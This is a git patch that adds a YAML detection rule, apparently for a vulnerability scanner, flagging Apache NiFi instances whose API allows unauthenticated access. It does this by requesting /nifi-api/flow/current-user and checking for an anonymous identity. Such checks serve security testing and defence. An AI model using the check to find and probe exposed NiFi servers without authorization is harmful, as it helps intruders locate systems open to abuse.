From a7bee494abbf30d14529fd75a3f01ec35a3573e2 Mon Sep 17 00:00:00 2001
From: wula <93594084+wulalalaaa@users.noreply.github.com>
Date: Thu, 4 Nov 2021 15:13:29 +0800
Subject: [PATCH] Add poc-yaml-apache-nifi-api-unauthorized-access (#1462)

---
 pocs/apache-nifi-api-unauthorized-access.yml | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)
 create mode 100644 pocs/apache-nifi-api-unauthorized-access.yml

diff --git a/pocs/apache-nifi-api-unauthorized-access.yml b/pocs/apache-nifi-api-unauthorized-access.yml
new file mode 100644
index 000000000..166a170a4
--- /dev/null
+++ b/pocs/apache-nifi-api-unauthorized-access.yml
@@ -0,0 +1,16 @@
+name: poc-yaml-apache-nifi-api-unauthorized-access
+manual: true
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /nifi-api/flow/current-user
+            follow_redirects: false
+        expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true")
+expression: r0()
+detail:
+    author: wulalalaaa(https://github.com/wulalalaaa)
+    links:
+        - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html